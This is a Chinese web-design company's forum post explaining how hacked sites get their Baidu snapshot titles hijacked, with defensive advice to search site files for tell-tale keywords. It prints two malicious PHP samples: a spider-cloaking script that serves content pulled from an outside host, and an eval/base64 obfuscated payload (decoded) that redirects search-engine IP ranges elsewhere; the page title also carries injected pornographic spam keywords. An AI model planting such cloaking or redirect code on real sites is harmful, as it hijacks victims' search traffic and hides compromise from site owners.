亚洲欧美成人综合一区_国产精品一区二区无码_亚洲风情偷拍区_成?人免费无码视频在线看

西安做網站_西安網站建設公司_西安網頁制作_西安網頁設計_西安網站制作設計公司

 找回密碼
 注冊

QQ登錄

只需一步,快速開始

搜索
查看: 10763|回復: 0
打印 上一主題 下一主題

篡改百度快照網頁標題的解決方法

[復制鏈接]
跳轉到指定樓層
樓主
發(fā)表于 2012-10-13 18:22:19 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式


最近客戶網站雖然百度收錄了三四萬 但發(fā)現好多快照標題不是自己網站的標題,麻煩啊 經過仔細查找 重要找到了解決辦法。
所謂的黑客利用漏洞 或者文件上傳可以修改程序文件或者上傳程序文件,這個文件是干啥的呢?就是用來區(qū)分是蜘蛛還是平常訪問,如果是蜘蛛爬行的話 他就引導蜘蛛抓他網站的頁面,導致快照標題是黑客搞的 點進去卻是自己網站的標題。

     類似這樣的篡改網頁標題的方法 現在發(fā)現有倆種

1、這些人會上傳一個文件 文件是:
  1. <?php
  2. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
  3. ini_set('display_errors',0);

  5. $spider_arr = array(
  6.         'baiduspider',
  7.         'baiduspider/2.0',
  8.         'baiducustomer',
  9.         'baidu-thumbnail',
  10.         'baiduspider-mobile-gate',
  11.         'baiduspider-mobile-gate',
  12.         'baidu-transcoder/1.0.6.0',

  14.         'googlebot/2.1',
  15.         'googlebot-image/1.0',
  16.         'feedfetcher-google',
  17.         'mediapartners-google',
  18.         'adsbot-google',
  19.         'googlebot-mobile/2.1',
  20.         'googlefriendconnect/1.0',

  22.         'sosospider',
  23.         'sosoblogspider',
  24.         'sosoimagespider',

  26.         'sogou web robot',
  27.         'sogou web spider/3.0',
  28.         'sogou web spider/4.0',
  29.         'sogou head spider/3.0',
  30.         'sogou-test-spider/4.0',
  31.         'sogou orion spider/4.0',
  32. );

  34. $not_spider_ip_arr = array(
  35.         "222.77.187.33",
  36.         "125.90.88.96"
  37. );

  39. $ref_arr = array(
  40.     'baidu.com',
  41.     'google.com'
  42. );

  44. $agent = $_SERVER['HTTP_USER_AGENT'];
  45. $rip = $_SERVER["REMOTE_ADDR"];
  46. $referer = $_SERVER["HTTP_REFERER"];

  48. $spider = false;
  49. foreach($spider_arr as $_spider) {
  50.         if(stripos($agent,$_spider) !== false) {
  51.                 $spider = true;
  52.                 break;
  53.         }
  54. }

  56. if(in_array($rip,$not_spider_ip_arr)) {
  57.         $spider = false;
  58. }

  60. $ref = false;
  61. foreach($ref_arr as $_ref) {
  62.         if(stripos($referer,$_ref) !== false) {
  63.                 $ref = true;
  64.                 break;
  65.         }
  66. }


  69. if(array_key_exists('bd',$_GET)&&$ref) {
  70.         $xt = trim($_GET['bd']);
  71.         Header("Location: ".'http://www.baidu.com?'.$_SERVER['SERVER_NAME']);
  72.         exit;
  73. }

  75. if($spider) {
  76.         echo file_get_contents('http://www.xxx.cn/web/bbs/xin.asp');
  77. }
  78. ?>
復制代碼
所以有遇到這樣情況的站站 請根據這個程序的關鍵字進行批量查找網站,比如 批量查找 echo file_get_contents( 這樣的關鍵詞語。如果您懂程序 就會發(fā)現 此程序的原理就是我剛說的 。

2、這些人 會 在網站上掛上


  1. eval(gzinflate(base64_decode('hVZ7b9owEP8fie/gWlGbrBASWFlbRqtuZRpTH4hV2ySGIje4xWpeckxY1fHdd3YeBGg6FMnx3e/ufvewSb1Wr1HOQ+5wGoVcsOBRt4xeveZ6JI4R8bxw6bAIvdRrqF5LCEdaIesjwjl51rHd7ph2+8j8YJt2s31k4QZuWx2zbR2bXcu0u1Ym7HbN9vsTs3sMKpC1FbANiGMwBLBtK6EMD8EeFoErWBggx3HDIBZ84QrdACKrbfWM7mgjzhIiKCpQPnmiI04fhyNdA7RRr8mUEHtAOmzhUeIGbmLDUNnCTyPDEWRJ/0ReOKM6NnFD2fZS9UPIKXHnSFc4EiPtqX+mJYV56n0vd59sOlcBImDkeMxnApl9pIk5i5tnZapJHmwLClx6uZ8Vol5My24Ji24Wfpl6E6gnJeK6xvoZbGJNexr7WGxtuT08NAqHKjQEVes5/otNjZ3iiVx666CrqrQgeR6FsV6SNmQpbaPfl7X3aFDWGU3bOFd7E0/xKSDNYrdOOX1RS5p+0bNSbKgo+FdG6VQgxKlY8KCM6lWOzCMVF573yQvdJ2hFXg/Z06xR+UnY7CmDuHapMOsx2bR6dWJyHxGZzTiN0RtDsWMCYEjXYXCSPeKm84p/y6HN3Rm9KqPC5h3YTKzmyfTFbnRWyvYVq4IdbskxiExYd1FQ4FhMpjKJ3GQHdHi4O0PZkvcqc7Ru1OLeY+66T+6cph2SZQS0IPceXVduq43gRhvG30IW0BmAHggMj5JFGyaO6zEaCOhTZiLVgjNfh1cpUXOQBVORsz4XQtXfhHiLVC3xaup8IgCFX1KdLDE4TEdgTsmMch1/vbsbteBORB3LRtdhAkxHlPskAEbes7ogc+hV6BJZhVM0FyI6bbWWy6VJ3XgeRoL60FRBTTf0lY0qYPrUa1l14eKkbx6BciGyNEBKgySl6Xy+Gg5u7pzhCBtof18Ok0ti6vpRJayB8CJ4CsJlANeh6hiUtgoM3NTx3on7y/lyO/55Mb4cXMq3t6PvgP/PYcfkNSbjwfXt3cC5uLysJrCBeTPuBrIcjsUxFbrmfB+MfwzGk4MS8GCq4lbotihVoF4lVYHNaOWowrCXT5Se3RirfKi0UJ299IshoMvio0JPj5GO9taQ5tn6NBvw96Xu538=')));
復制代碼
這樣的東東,其實懂程序的人也知道 他只是障眼法,這個是通過encoded_data 這個函數把php程序進行壓縮,我們發(fā)現通過 base64_decode解碼出來后 是:


  1. <?php


  4. error_reporting(0);
  5. class allow_ip {

  7. var $allow_ip = array("123.125.71.1-250","203.208.60.160-250","66.249.68.200-220","220.181.108.11-220");

  9. function __construct(){
  10. }

  12. function __destruct(){
  13. }

  15. private function makePregIP($str)
  16. {
  17.   if (strstr($str,"-")) {
  18.     $aIP = explode(".",$str);
  19.     foreach ($aIP as $k=>$v) {
  20.       if (!strstr($v,"-")) {
  21.         $preg_limit .= $this->makePregIP($v);
  22.     $preg_limit .= ".";
  23.       } else{
  24.         $aipNum = explode("-",$v);
  25.     for($i=$aipNum[0];$i<=$aipNum[1];$i++){
  26.       $preg .=$preg?"|".$i:"[".$i;
  27.         }
  28.         $preg_limit .=strrpos($preg_limit,".",1)==(strlen($preg_limit)-1)?$preg."]":".".$preg."]";
  29.       }
  30.     }
  31.   } else {
  32.     $preg_limit = $str;
  33.   }

  35.   return $preg_limit;
  36. }

  38. private function getAllBlockIP(){
  39.     if ($this->allow_ip) {
  40.         $i = 1;
  41.         foreach ($this->allow_ip as $k=>$v) {
  42.             $ipaddres = $this->makePregIP($v);

  44.             $ip = str_ireplace(".","\.",$ipaddres);
  45.             $ip = str_replace("*","[0-9]{1,3}",$ip);
  46.             $ipaddres = "/".$ip."/";
  47.             $ip_list[] = $ipaddres;
  48.             $i++;
  49.         }
  50.     }
  51.     return $ip_list;
  52. }

  54. public function checkIP() {
  55. $iptable = $this->getAllBlockIP();
  56. $IsJoined = false;
  57. $Ip = $this->get_client_ip();
  58. $Ip = trim($Ip);
  59. if ($iptable) {
  60. foreach($iptable as $value) {
  61. if (preg_match("{$value}",$Ip)) {
  62. header("HTTP/1.1 301 Moved Permanently");
  63. header("Location: http://www.xxxx.com");

  65. }
  66. }
  67. }

  69. return true;
  70. }

  72. private function get_client_ip(){
  73. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  74. $ip = getenv("HTTP_CLIENT_IP");
  75. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  76. $ip = getenv("HTTP_X_FORWARDED_FOR");
  77. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  78. $ip = getenv("REMOTE_ADDR");
  79. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  80. $ip = $_SERVER['REMOTE_ADDR'];
  81. else
  82. $ip = "unknown";
  83. return($ip);
  84. }
  85. }

  87. $oBlock_ip = new allow_ip();
  88. if( !$oBlock_ip->checkIP() ) exit;


  91. ?>
復制代碼

那么第二種方式 站長可以用 eval(gzinflate(base64_decode 關鍵字進行批量查找程序  看是否有。

以上就是目前發(fā)現的2種掛馬 篡改快照的方法。

西安網站建設 | 西安做網站 —— 劍鋒所指 所向披靡!
您需要登錄后才可以回帖 登錄 | 注冊

本版積分規(guī)則

QQ|小黑屋|手機版|Archiver|西安網站建設

GMT+8, 2024-10-22 18:46 , Processed in 0.041363 second(s), 14 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回復 返回頂部 返回列表